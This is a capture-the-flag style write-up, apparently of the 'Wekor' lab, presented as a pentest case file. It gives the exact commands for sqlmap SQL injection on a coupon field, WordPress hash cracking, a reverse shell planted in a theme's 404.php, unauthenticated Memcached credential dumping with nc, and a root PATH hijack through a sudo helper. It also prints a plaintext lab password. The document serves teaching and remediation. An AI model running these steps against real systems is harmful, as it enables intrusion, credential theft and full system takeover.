Case file

Coupon SQLi, WordPress theme RCE, and PATH hijack via bitcoin

Intermediate web engagement: coupon SQLi dumped WordPress hashes; theme editor RCE as www-data; Memcached held Orka credentials; sudo bitcoin resolved python from a writable PATH entry for root.

Intermediate30 minSQLi · WordPress · Memcached · Privilege Escalation
  • SQLi on a shop coupon parameter exposed WP users. Theme edit planted a shell. Unauthenticated Memcached disclosed Orka; a relative python call under sudo bitcoin completed root.

  • sqlmap dumped WP hashes; cracked admin wp_yura edited the theme for a reverse shell.

  • Unauthenticated Memcached cachedump returned Orka’s password for su.

  • Planted /usr/sbin/python as a bash wrapper; sudo bitcoin resolved it and dropped a root shell.

01

Engagement summary

SQLi on a shop coupon parameter exposed WP users. Theme edit planted a shell. Unauthenticated Memcached disclosed Orka; a relative python call under sudo bitcoin completed root.

WEKOR (wekor.thm / site.wekor.thm) exposed a shop under /it-next/ with a coupon field vulnerable to SQL injection. sqlmap dumped wordpress.wp_users; John cracked wp_yura (Administrator). On the site vhost we used the theme editor to drop a PHP reverse shell into 404.php and caught www-data. Local Memcached on 11211 had no authentication — cachedump returned Orka / OrkAiSC00L24/7$. As Orka, sudo -l allowed /home/Orka/Desktop/bitcoin, which invoked python /home/Orka/Desktop/transfer.py via a relative path. secure_path preferred /usr/sbin, which Orka could write; planting a fake python there and re-running bitcoin under sudo yielded root.

Business impact

Coupon SQLi is a database breach. Theme-editor access is RCE. Open Memcached leaks credentials. Sudo binaries that call relative interpreters with a writable secure_path entry are root. Parameterize SQL, lock down theme editing, bind Memcached to localhost with auth, and use absolute interpreter paths under sudo.

02

Coupon SQLi and WordPress RCE

sqlmap dumped WP hashes; cracked admin wp_yura edited the theme for a reverse shell.

OPERATOR · SQLI

savvy@lab:~$ echo '<IP> wekor.thm site.wekor.thm' | sudo tee -a /etc/hosts

savvy@lab:~$ sqlmap -r it_cart_coupon.xml --dump -D wordpress -T wp_users --threads=10

savvy@lab:~$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

wp_yura cracked — Administrator role

OPERATOR · THEME SHELL

# WP admin → Appearance → Theme Editor → 404.php reverse shell

savvy@lab:~$ nc -nlvp 4444

savvy@lab:~$ curl http://site.wekor.thm/wordpress/wp-content/themes/.../404.php

savvy@lab:/var/www/html$

03

Memcached credential dump

Unauthenticated Memcached cachedump returned Orka’s password for su.

OPERATOR · MEMCACHED

savvy@lab:~$ echo "stats items" | nc -vn -w 1 127.0.0.1 11211

savvy@lab:~$ echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211

savvy@lab:~$ echo "get username" | nc -vn -w 1 127.0.0.1 11211

VALUE username 0 4\r\nOrka

savvy@lab:~$ echo "get password" | nc -vn -w 1 127.0.0.1 11211

OrkAiSC00L24/7$

savvy@lab:~$ su Orka

savvy@lab:~$

04

Relative python PATH hijack

Planted /usr/sbin/python as a bash wrapper; sudo bitcoin resolved it and dropped a root shell.

OPERATOR · PATH HIJACK

savvy@lab:~$ sudo -l

(root) NOPASSWD: /home/Orka/Desktop/bitcoin

# bitcoin calls relative python; secure_path includes writable /usr/sbin

savvy@lab:~$ printf '#!/bin/bash\n/bin/bash\n' > /usr/sbin/python && chmod +x /usr/sbin/python

savvy@lab:~$ sudo /home/Orka/Desktop/bitcoin

# prompt password: password ; amount: 20

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Fix SQLi; disable theme file editing in production. Authenticate and firewall Memcached. Rewrite sudo helpers to call /usr/bin/python3 with a fixed script path; remove world-writable directories from secure_path.